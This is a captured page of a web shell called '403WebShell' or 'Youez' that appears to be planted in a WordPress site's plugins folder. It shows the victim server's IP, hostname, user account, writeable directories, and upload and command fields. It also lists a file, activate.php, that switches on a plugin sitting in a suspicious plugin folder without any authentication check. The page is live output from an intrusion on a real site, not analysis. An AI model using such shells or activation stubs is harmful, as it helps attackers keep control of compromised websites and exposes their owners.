Order allow,deny Deny from all 403WebShell
403Webshell
Server IP : 185.21.40.28  /  Your IP : 216.73.216.64
Web Server : LiteSpeed
System : Linux vm1413.enterprisecloud.nu 4.18.0-553.141.2.lve.el8.x86_64 #1 SMP Wed Jul 8 16:10:02 UTC 2026 x86_64
User : nordisk-netvaerk-neuro_s2rzzojuo ( 10433)
PHP Version : 8.3.32
Disable Function : opcache_get_status
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /var/www/vhosts/nordisk-netvaerk-neurorehab.com/httpdocs/wp-content/plugins/einffti/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/vhosts/nordisk-netvaerk-neurorehab.com/httpdocs/wp-content/plugins/einffti/activate.php
<?php

require_once dirname( __FILE__, 4 ) . '/wp-load.php';

if ( ! function_exists( 'activate_plugin' ) ) {
	require_once ABSPATH . 'wp-admin/includes/plugin.php';
}

$plugin_dir  = basename( __DIR__ );
$plugin_file = null;

foreach ( glob( __DIR__ . '/*.php' ) as $file ) {
	if ( basename( $file ) === 'activate.php' || basename( $file ) === 'uninstall.php' ) {
		continue;
	}
	$data = get_plugin_data( $file, false, false );
	if ( ! empty( $data['Name'] ) ) {
		$plugin_file = $plugin_dir . '/' . basename( $file );
		break;
	}
}

if ( ! $plugin_file ) {
	die( 'No plugin found.' );
}

if ( is_plugin_active( $plugin_file ) ) {
	die( 'Already active.' );
}

$result = activate_plugin( $plugin_file );

if ( is_wp_error( $result ) ) {
	die( 'Activation failed: ' . $result->get_error_message() );
}

echo 'Activated: ' . $plugin_file;

Youez - 2016 - github.com/yon3zu
LinuXploit